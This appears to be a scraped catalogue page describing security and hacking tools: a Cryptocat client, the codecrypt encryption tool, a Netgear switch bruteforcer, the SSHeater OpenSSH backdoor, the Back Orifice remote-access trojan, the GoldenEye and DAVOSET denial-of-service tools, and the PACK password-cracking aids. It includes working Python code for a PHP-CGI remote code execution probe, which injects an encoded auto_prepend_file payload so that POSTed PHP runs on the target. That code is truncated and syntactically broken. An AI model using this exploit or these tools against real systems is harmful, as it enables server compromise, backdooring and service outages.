
OpenBSD, FreeBSD, Solaris, and/or other Unix variants


pyCryptocat - A Cryptocat standalone python client

Authors and contributors
Simone Margaritelli (evilsocket)
Raffaele Forte

Cryptocat is free software that aims to provide an open, accessible Instant Messaging environment that encrypts your conversations and works right in your browser.
pyCryptocat is a Cryptocat standalone chat client written in Python, using python-webkit package to serve Cryptocat JS and HTML files.
Cryptocat provides multi-user (and private) instant messaging inside chatrooms. It uses the OTR protocol for encrypted two-party chat and the (upcoming) mpOTR protocol for encrypted multi-party chat.
The goal is to provide the easiest, most accessible way to chat while maintaining your privacy online.

PHP-CGI Remote Code Execution Scanner

PHP-CGI Remote Code Execution Scanner - This small python script scans for a number of variations on the PHP-CGI remote code execution vulnerability, includes "apache magica" and plesk paths, along with other misconfigurations.

Authored by infodox

# Written for /r/netsec
# test for the apache-magicka exploit bug. Added plesk and "how not to configure your box" paths.
# infodox - insecurety.net - 2013
# Twitter: @info_dox
# Bitcoins: 1PapWy5tKx7xPpX2Zg8Rbmevbk5K4ke1ku
# released under WTFPL
import requests
import sys

def scan(target):
    paths = ['/index.php', '/cgi-bin/php', '/cgi-bin/php5', '/cgi-bin/php-cgi', '/cgi-bin/php.cgi', '/cgi-bin/php4', '/phppath/php', '/phppath/php5', '/local-bin/php', '/local-bin/php5']
    for path in paths:
        probe(target, path)

def probe(target, path):
    print "[*] Testing Path: %s" %(path)
    trigger = path + "/?"
    trigger += "%2D%64+%61%6C%6C%6F%77%5F%75%72%"
    trigger += "6C%5F%69%6E%63%6C%75%64%65%3D%6F"
    trigger += "%6E+%2D%64+%73%61%66%65%5F%6D%6F"
    trigger += "%64%65%3D%6F%66%66+%2D%64+%73%75"
    trigger += "%68%6F%73%69%6E%2E%73%69%6D%75%6"
    trigger += "C%61%74%69%6F%6E%3D%6F%6E+%2D%64"
    trigger += "+%64%69%73%61%62%6C%65%5F%66%75%"
    trigger += "6E%63%74%69%6F%6E%73%3D%22%22+%2"
    trigger += "D%64+%6F%70%65%6E%5F%62%61%73%65"
    trigger += "%64%69%72%3D%6E%6F%6E%65+%2D%64+"
    trigger += "%61%75%74%6F%5F%70%72%65%70%65%6"
    trigger += "E%64%5F%66%69%6C%65%3D%70%68%70%"
    trigger += "3A%2F%2F%69%6E%70%75%74+%2D%6E"
    url = target + trigger
    php = """<?php echo "Content-Type:text/html\r\n\r\n"; echo md5('1337x'); ?>"""
        haxor = requests.post(url, php)
        if "44e902a5aa760d79b76e070fa6725386" in haxor.text:
            print "Exploitable!"
    except Exception:
        print "Err, Someshit broke"

def main(args):
    if len(sys.argv) !=2:

Nsdtool Netgear Switch Scanner

Nsdtool is a toolset of scripts used to detect Netgear switches in local networks.
The tool contains some extra features like bruteforce and setting a new password.
Netgear has its own protocol called NSDP (Netgear Switch Discovery Protocol), which is implemented to support security tests on the commandline.
It is not being bound to the delivered tools by Netgear.


The post-quantum cryptography tool.
This is a GnuPG-like unix program for encryption and signing that uses only quantum-computer-resistant algorithms:
McEliece cryptosystem (compact quasi-dyadic variant) for encryption
Hash-based Merkle tree algorithm (FMTSeq variant) for digital signatures

Why this?
Go read http://pqcrypto.org/

infopage: http://e-x-a.org/codecrypt/
package downloads: http://e-x-a.org/codecrypt/files/

There is a complete, UNIXy manual page supplied with the package. You can view it online here: http://e-x-a.org/codecrypt/ccr.1.html

Quick How-To
Everything is meant to work mostly like GnuPG, but with some good simplicity margin. Let's play with random data!

ccr -g help
ccr -g fmtseq128-sha --name "John Doe"    # your signature key
ccr -g mceqd128 --name "John Doe"     # your encryption key

ccr -K  #watch the generated keys
ccr -k

ccr -p -a -o my_pubkeys.asc -F Doe  # export your pubkeys for friends

#see what people sent us
ccr -ina < friends_pubkeys.asc

#import Frank's key and rename it
ccr -ia -R friends_pubkeys.asc --name "Friendly Frank"

#send a nice message to Frank (you can also specify him by @12345 keyid)
ccr -se -r Frank < Document.doc > Message_to_frank.ccr

#receive a reply
ccr -dv -o Decrypted_verified_reply.doc <Reply_from_frank.ccr

#rename other's keys
ccr -m Frank -N "Unfriendly Frank"

#and delete pukeys of everyone who's Unfriendly
ccr -x Unfri

#create hashfile from a large file
ccr -sS hashfile.ccr < big_data.iso

#verify the hashfile
ccr -vS hashfile.ccr < the_same_big_data.iso

Option reference
For completeness I add listing of all options here (also available from ccr --help)
Usage: ./ccr [options]

Common options:
 -h, --help     display this help
 -V, --version  display version information
 -T, --test     perform (probably nonexistent) testing/debugging stuff

Global options:


SSHeater is a program that infects the OpenSSH daemon in run-time in order to log all future sessions and implement a backdoor where a single password, chosen by the user, can log into all accounts in the system. There's a log parser included in the package that can display authentication information about sessions as well as play the session just like TTYrec/play.


Simple IPv4 and IPv6 banner grabbing scripts; typically used for telnet/cisco appliances, although may work on services.

Back Orifice (BO)

Back Orifice debuted at DEF CON 6 on August 1, 1998. It was the brainchild of Sir Dystic, a member of the U.S. hacker organization Cult of the Dead Cow. According to the group, its purpose was to demonstrate the lack of security in Microsoft's operating system Windows 98.

The last version was bo2k (back orifice 2k) which previously had the source code open & available for download. Currently we have been unable to locate a copy of that source.

The Back Orifice Server Contains the Following Functionality
System control
Create dialog boxes with the text of your choice. Log keystrokes. Lockup or reboot the machine.

Get detailed system information, including:
current user
cpu type
windows version
memory usage
mounted disks
(including hard drives, cdroms, removable drives and remote network drives) and information for those drives
screensaver password
passwords cached by the user
(including those for dialups, web and network access, and any other password cached by the operating system)

File system control
Copy, rename, delete, view, and search files and directories. File compression and decompression.
Process control
List, kill, and spawn processes.
Registry control
List, create, delete and set keys and values in the registry.
Network control
View all accessible network resources, all incoming and outgoing connections, list, create and delete network connections, list all exported resources and their passwords, create and delete exports.
Multimedia control
Play wav files, capture screen shots, and capture video or still frames from any video input device (like a Quickcam).
Packet redirection
Redirect any incoming TCP or UDP port to any other address & port.
Application redirection
Spawn most console applications (such as command.com) on any TCP port, allowing control of applications via a telnet session.
HTTP server Upload and download files on any port using a www client such as Netscape.


GoldenEye is an python app for SECURITY TESTING PURPOSES ONLY!
GoldenEye is a HTTP DoS Test Tool.
Attack Vector exploited: HTTP Keep Alive + NoCache

GoldenEye is an HTTP/S Layer 7 denial of service testing tool. It uses KeepAlive (and Connection: keep-alive) paired with Cache-Control options to persist socket connection busting through caching (when possible) until it consumes all available sockets on the HTTP/S server.

Changes: Referer strings from search engines now only domain part hardcoded. Referer generation function now generates even more random referers. Evades Juniper Netscreen signature. Various other updates and improvements.

USAGE: ./goldeneye.py [OPTIONS]
Flag Description Default
-t, --threads Number of concurrent threads (default: 500)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

USAGE: ./goldeneye.py [OPTIONS]

Flag Description Default
-u, --useragents File with user-agents to use (default: randomly generated)
-w, --workers Number of concurrent workers (default: 50)
-s, --sockets Number of concurrent sockets (default: 30)
-m, --method HTTP Method to use 'get' or 'post' or 'random' (default: get)
-d, --debug Enable Debug Mode [more verbose output] (default: False)
-h, --help Shows this help

util/getuas.py - Fetchs user-agent lists from http://www.useragentstring.com/pages/useragentstring.php subpages (ex: ./getuas.py http://www.useragentstring.com/pages/Browserlist/) REQUIRES BEAUTIFULSOUP4

PACK - Password Analysis & Cracking Kit

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

The most basic analysis that you can perform is simply obtaining most common length, character-set and other characteristics of passwords in the provided list. In the example below, we will use 'rockyou.txt' containing approximately 14 million passwords. Launch statsgen.py with the following command line:
$ python statsgen.py rockyou.txt

Using filters
Let's see how RockYou users tend to select their passwords using the "stringdigit" simple mask (a string followed by numbers):
$ python statsgen.py ../PACK-0.0.3/archive/rockyou.txt --simplemask stringdigit -q --hiderare

Saving advanced masks
While the "Advanced Mask" section only displays patterns matching greater than 1% of all passwords, you can obtain and save a full list of password masks matching a given dictionary by using the following command:
$ python statsgen.py rockyou.txt -o rockyou.masks

MaskGen allows you to craft pattern-based mask attacks for input into Hashcat family of password crackers. The tool uses output produced by statsgen above with the '-o' flag in order to produce the most optimal mask attack sorted by mask complexity, mask occurrence or ratio of the two (optimal index).
Let's run MaskGen with only StatGen's output as an argument:
$ python maskgen.py rockyou.masks

Specifying target time


(Translation provided by google)
DDoS attacks via other sites execution tool (DAVOSET) - a tool for use by Abuse of Functionality and XML External Entities vulnerabilities at some sites for attacks on other sites (including DoS and DDoS attacks). Which was developed by me in 2010.

On these attacks, I wrote the article sites use to attack other sites . In the article the effectiveness of the attacks on sites through the use of other sites I announced DAVOSET and explored the effectiveness of these attacks. I also wrote about the benefits of these attacks .

This tool is written in perl.

# DDoS attacks via other sites execution tool
# DAVOSET v.1.1.4
# Tool for conducting of DDoS attacks on the sites via other sites
# Copyright (C) MustLive 2010-2013
# Last update: 03.12.2013
# <a href="Http://websecurity.com.ua<br />
#" title="Http://websecurity.com.ua<br />
#">Http://websecurity.com.ua<br />
#</a> # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Program summary
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

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